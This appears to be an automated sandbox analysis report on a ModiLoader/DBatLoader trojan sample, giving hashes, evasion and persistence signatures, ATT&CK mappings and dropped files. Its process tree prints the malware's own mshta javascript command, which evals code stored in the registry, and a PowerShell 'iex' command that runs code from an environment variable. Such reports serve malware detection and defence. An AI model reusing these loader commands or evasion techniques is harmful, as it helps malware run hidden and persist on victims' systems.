Overview

overview

10

Static

static

3

4190670a18...18.exe

windows7-x64

10

4190670a18...18.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    14-05-2024 12:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4190670a189b03fa8d4a61d50ac5be80_JaffaCakes118.exe

  • Size

    280KB

  • MD5

    4190670a189b03fa8d4a61d50ac5be80

  • SHA1

    739b72f3b5d83114fca289918e901562c68239ed

  • SHA256

    4a267ff8a165f16aa287dc9ed2643b558b8578252c52fb6aaa198bb907751158

  • SHA512

    87c74725af6c55511cff83cf3886785786c37223cf5fe0323311a26d011535e8188bf3dd0f1ac5c352cc74b15fe77cb0fa67a9cf683c67da673ab938b879f3ec

  • SSDEEP

    6144:7y9n70iH6yfi3hRgmDRgHRW456Oex1Vu5:7y9SyfEDRgH845M3q

Score
10/10
modiloaderevasionpersistencetrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
    evasion
  • ModiLoader Second Stage 58 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4190670a189b03fa8d4a61d50ac5be80_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\4190670a189b03fa8d4a61d50ac5be80_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Users\Admin\AppData\Local\Temp\4190670a189b03fa8d4a61d50ac5be80_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\4190670a189b03fa8d4a61d50ac5be80_JaffaCakes118.exe"
      2⤵
        PID:1216
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:UjOb7C4="lrq";y6T5=new%20ActiveXObject("WScript.Shell");m5yojpE0a="1ey";f4e6qT=y6T5.RegRead("HKLM\\software\\Wow6432Node\\Mn67lc\\dM4k2fA");MrqLzT79s="Gk";eval(f4e6qT);j0Lt1GpMb="faYRnlus";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:akfzdvz
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2604
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2188
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:2540

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Virtualization/Sandbox Evasion

      3
      T1497

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      Software Discovery

      1
      T1518

      Query Registry

      4
      T1012

      Virtualization/Sandbox Evasion

      3
      T1497

      File and Directory Discovery

      1
      T1083

      System Information Discovery

      3
      T1082

      Peripheral Device Discovery

      1
      T1120

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\416844\1a6bc1.983f33d
        Filesize

        40KB

        MD5

        c27ba0f2a65debeb4d42367091e68192

        SHA1

        070fc35434f829a7cbcf03fbe0f24a97074262d8

        SHA256

        992c17e3c5cedac62a157761b69b0fb8dd92266bf54e9d775d3660c63a4e02ea

        SHA512

        4e50b92e2c6828ed11d56b0c17267ba2fa3bdda03514ae3f46ce0e1a70ec3ff80adc596f0ffa295fa62b762eb0a033c8e04289eba61af5913295e5db42ba0b94

        Download Submit
      • C:\Users\Admin\AppData\Local\416844\7efaba.bat
        Filesize

        61B

        MD5

        a9d3ea542d72c3d4eb6e79b37f9b265e

        SHA1

        9ef048c6a4cc72891fe4b6d8c3ae59e134711cb9

        SHA256

        d287a2bcc9c2485a60329a6bb94fb260bec57524e3098a5bd7c7cedf3e460314

        SHA512

        eba879b158972749be9a48b1ff0d7393f69960da48c1f8e92c3886d9cf16ae437ac5eea449f59de788cbf5b9033ebc78311f2b591f6d41631521a3f0ea24208b

        Download Submit
      • C:\Users\Admin\AppData\Local\416844\eecdc5.lnk
        Filesize

        881B

        MD5

        79bdbb7bc59c50fddee13ba5f2e146d9

        SHA1

        25142e7b51a0843d3bf0a4127d15c939b4dcc00a

        SHA256

        e5a211654f62c643f8b27813093840fccaf35ea1b8a77db5d976f73863894531

        SHA512

        5ac9258c9a041188224f19524d1d362c865263bb7db1c661ce090efb07481ecfd8644473e31018f251ead5d8e265c9f96bfef0bc5f5c30f8b9f8d181cddadbc7

        Download Submit
      • C:\Users\Admin\AppData\Roaming\730a4b\791dbf.983f33d
        Filesize

        19KB

        MD5

        6ef8b0f6116f69f1a9c13dddcde23216

        SHA1

        f60d123dc52ce61d262e8d85d678be1bc6422105

        SHA256

        e653d340c03936da1db73bdb50ee4f76c908d3dc269230c040a29201682b6aa3

        SHA512

        e109dafdbcc4fd240b8961e549bc9d7e291cdb3aa9a87e12c617ac198675a250e5159115fad0fd601d7f84aeef2f3a0d91b4c1024e382e53b305baddb722fc27

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk
        Filesize

        991B

        MD5

        f18f219ea96b79c98d7af9c664c3a4e4

        SHA1

        307927dd52e9d9f92dee4bc1ed5d9097d64d533e

        SHA256

        662ea70fd8967cf03f918481574be0324814204f28f8b54205c1258d0d3659d3

        SHA512

        e56ece41da49de57b88be54097be3a26fde071e000734e4c7c22c07e8445d2cbf20e300b1bed93f2e45d8aae49b88ff5ff0f23dde6ff55315977d7123e8ce5fa

        Download Submit
      • memory/1216-6-0x0000000000320000-0x00000000003F6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1216-7-0x0000000000320000-0x00000000003F6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1216-11-0x0000000000320000-0x00000000003F6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1216-12-0x0000000000320000-0x00000000003F6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1216-8-0x0000000000320000-0x00000000003F6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1216-9-0x0000000000320000-0x00000000003F6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1216-2-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/1216-5-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/1216-4-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/2188-41-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-33-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-27-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-38-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-45-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-30-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-47-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-46-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-44-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-60-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-48-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-43-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-42-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-58-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-56-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-55-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-54-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-49-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-32-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-40-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-39-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-37-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-36-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-35-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-34-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-24-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-31-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-28-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-59-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-66-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-29-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2188-23-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-70-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-79-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-69-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-74-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-76-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-75-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-73-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-71-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-81-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-80-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-78-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-72-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-68-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-77-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2540-67-0x0000000000130000-0x0000000000271000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2604-25-0x0000000002FF0000-0x0000000004FF0000-memory.dmp
        Filesize

        32.0MB

        Download
      • memory/2604-26-0x00000000062C0000-0x0000000006396000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2604-21-0x00000000062C0000-0x0000000006396000-memory.dmp
        Filesize

        856KB

        Download